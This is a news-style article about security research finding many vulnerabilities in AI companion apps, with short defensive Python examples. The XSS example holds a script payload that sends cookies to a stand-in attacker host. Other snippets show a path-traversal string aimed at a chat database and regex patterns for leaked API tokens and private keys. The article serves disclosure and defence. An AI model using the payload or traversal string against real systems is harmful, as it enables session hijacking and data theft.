Tuesday, March 24, 2026

Beware of AI Girlfriends: They're Leaking Your Private Messages!

Millions of people are turning to artificial intelligence for companionship, but these same digital sweethearts are silently leaking their users' deepest secrets to hackers. Researchers have found critical security flaws in most of the popular AI girlfriend apps they examined.

Artificial intelligence has permeated almost every aspect of daily life, and it will enter personal spaces even more. Unfortunately, hackers and privacy risks are advancing at the same pace, and the millions of users who trust so-called AI companion apps face significant privacy risks.

AI Companion Apps Exceed 150 Million Downloads

Security firm Oversecured reported finding 14 critical and 311 high-severity vulnerabilities across 17 popular AI dating apps, which collectively have over 150 million downloads on Google Play. In at least six popular AI girlfriend apps, attackers can access user conversations, which are often highly personal, explicit, and linked to real identities.

  • AI roleplay platform: Over 50 million downloads
  • AI card game / chat: Over 50 million downloads
  • Open dialogue platform: Over 10 million downloads
  • Multi-voice AI chat: Over 10 million downloads
  • AI productivity agent: Over 10 million downloads
  • AI friend / partner: Over 10 million downloads
  • AI assistant chatbot: Over 10 million downloads
  • AI girlfriend / character: Over 5 million downloads
  • Virtual AI friend: Over 1 million downloads
  • AI dating simulator: Over 1 million downloads
  • Realistic AI companion: Over 1 million downloads
  • AI Q&A chatbot: Over 1 million downloads
  • Conversational AI coach: Over 500 thousand downloads
  • AI companion with memory: Over 100 thousand downloads
  • AI dating companion: Over 100 thousand downloads
  • AI romance metaverse: Over 100 thousand downloads
  • AI romance character: Over 100 thousand downloads

14 Critical Security Flaws in 17 Apps

Users who treat AI models as romantic partners openly share their sexual fantasies, describe their relationships, and more. All of these private conversations are typically stored and tied to user accounts. Vulnerabilities discovered in 10 of the 17 apps analyzed by the researchers open a pathway to users' conversations with the AI bots. In effect, users entrust their most vulnerable truths to systems that may be less secure than a basic messaging app.

According to the researchers, one AI companion app with over 10 million downloads ships with hardcoded credentials, including an OpenAI API token and a Google Cloud private key, embedded directly in its code. Extracting them requires little more than basic reverse engineering.
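To see why extraction is trivial, consider that such secrets sit as plain strings in the decompiled app and can be found with simple pattern matching. The sketch below is illustrative, not the researchers' tooling; the regex patterns and the sample "decompiled" text are assumptions chosen to resemble OpenAI-style tokens and Google Cloud private-key blocks.

```python
import re

# Hypothetical patterns for the credential types described in the report:
# OpenAI-style API tokens and PEM-encoded private keys.
SECRET_PATTERNS = {
    "openai_token": re.compile(r"sk-[A-Za-z0-9_-]{20,}"),
    "private_key": re.compile(r"-----BEGIN (?:RSA )?PRIVATE KEY-----"),
}

def find_embedded_secrets(text: str) -> list[tuple[str, str]]:
    """Return (label, match) pairs for anything that looks like a hardcoded secret."""
    hits = []
    for label, pattern in SECRET_PATTERNS.items():
        for match in pattern.findall(text):
            hits.append((label, match))
    return hits

# Fictional strings pulled from a decompiled APK:
decompiled = 'API_KEY = "sk-abc123def456ghi789jkl012"\nkey = "-----BEGIN PRIVATE KEY-----"'
print(find_embedded_secrets(decompiled))
```

Real secret scanners (and attackers) work the same way at scale, which is why credentials belong on a server the app talks to, never in the shipped binary.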

Another app contains a cross-site scripting (XSS) vulnerability in its chat interface, enabling an attacker to inject malicious code into what appears to be a private conversation. This can lead to real-time message interception, session hijacking, and even the creation of fake responses within the chat.
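The usual root cause of chat XSS is rendering user- or model-supplied text as HTML without escaping it. A minimal sketch of the fix, assuming a hypothetical chat-bubble renderer (the function name and markup are illustrative, not from the vulnerable app):

```python
import html

def render_chat_message(author: str, text: str) -> str:
    """Build chat-bubble HTML, escaping all externally controlled text
    so injected markup is displayed literally instead of executed."""
    return f'<div class="msg"><b>{html.escape(author)}</b>: {html.escape(text)}</div>'

# A message carrying a script payload is neutralized:
payload = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
print(render_chat_message("user", payload))
```

With escaping in place, the `<script>` tag reaches the page as `&lt;script&gt;...` and never runs; without it, the payload executes in the victim's chat session, which is exactly the interception and hijacking scenario described above.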

A third vulnerability allows arbitrary file theft, exposing local chat databases, cached photos, voice messages, and authentication tokens. The affected app is known for hosting explicit content.
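Arbitrary file theft in mobile apps typically comes down to a file-serving component that accepts a relative path and never checks whether it escapes the app's sandbox (e.g. `../../databases/chat.db`). A minimal sketch of the missing check, with a hypothetical sandbox root and function name chosen for illustration:

```python
from pathlib import Path

APP_DATA = Path("/data/app/files").resolve()  # hypothetical app sandbox root

def safe_resolve(requested: str) -> Path:
    """Resolve a requested file path and refuse anything that escapes
    the app's data directory, blocking path-traversal exfiltration."""
    candidate = (APP_DATA / requested).resolve()
    if candidate != APP_DATA and APP_DATA not in candidate.parents:
        raise ValueError(f"path escapes sandbox: {requested}")
    return candidate

safe_resolve("avatars/cat.png")              # allowed: stays inside the sandbox
try:
    safe_resolve("../../databases/chat.db")  # blocked: traverses out of it
except ValueError as exc:
    print(exc)
```

Apps vulnerable to this class of bug skip the containment check, so a crafted request can walk out of the intended directory and read chat databases or token stores directly.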

Perhaps most strikingly, an app with 50 million downloads was found to be exploitable through adware: malicious advertising can trigger internal app components and directly query the databases storing user conversations. It is a chain attack carried out through something as mundane as an in-app banner.

According to researchers, most of the newly discovered vulnerabilities remain unpatched.

The security flaws uncovered so far may only be the tip of the iceberg. High-profile data leaks linked to AI girlfriend apps have already occurred. Reportedly, the AI girlfriend site Muah.ai exposed users' explicit fantasies and private bots. Researchers had previously revealed that Chattee Chat and GiMe Chat apps leaked over 43 million messages and more than 600,000 photos and videos from over 400,000 users.
